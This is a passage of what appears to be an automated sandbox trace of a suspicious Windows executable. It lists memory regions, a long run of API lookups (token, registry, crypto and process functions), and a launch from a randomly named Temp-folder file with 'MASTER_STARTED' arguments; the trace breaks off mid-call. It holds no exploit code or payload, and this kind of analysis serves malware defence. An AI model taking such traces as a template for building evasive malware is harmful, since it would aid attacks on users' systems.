1160 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1161 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1162 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1163 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1164 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1165 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1166 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1167 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1168 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1169 start_va = 
0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1170 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1255 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1256 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1257 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1258 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1259 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1260 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1261 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1262 start_va = 0x1440000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1263 start_va = 0x1630000 end_va = 0x18fefff entry_point = 0x1630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: 
"c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1264 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1265 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1315 start_va = 0x2d0000 end_va = 0x2e0fff entry_point = 0x2d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1316 start_va = 0x1440000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1317 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 1318 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1319 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1320 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1321 start_va = 0x1900000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1322 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1323 start_va = 0x737c0000 end_va = 
0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1332 start_va = 0x1900000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1333 start_va = 0x1a20000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 1334 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1335 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 20 os_tid = 0xb78 [0096.863] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.863] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.863] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0096.864] GetProcAddress (hModule=0x76910000, 
lpProcName="SwitchToThread") returned 0x7694eb24 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0096.865] GetProcAddress (hModule=0x76910000, 
lpProcName="LoadLibraryW") returned 0x76963c01 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0096.866] GetProcAddress 
(hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 
0x76953e61 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.868] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0096.869] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0096.869] 
GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0096.870] GetProcAddress (hModule=0x76910000, 
lpProcName="GetModuleHandleW") returned 0x7696374d [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0096.872] 
GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.872] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0096.873] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0096.873] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0096.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0096.873] GetProcAddress (hModule=0x769f0000, 
lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0096.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0096.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0096.874] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0096.874] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 
0x76c148f1 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0096.875] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0096.875] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0096.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0096.875] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0096.875] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0096.875] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") 
returned 0x76b5ebd5 [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0096.876] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0096.876] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0096.876] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0096.876] SetThreadLocale (Locale=0x400) returned 1 [0096.876] GetVersion () returned 0x1db10106 [0096.876] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.877] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0096.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.877] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0096.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.877] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0096.877] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0096.877] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.877] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0096.877] GetACP () returned 0x4e4 [0096.877] GetCurrentThreadId () returned 0xb78 [0096.877] GetVersion () returned 0x1db10106 [0096.877] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x141cb8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.877] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.877] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: 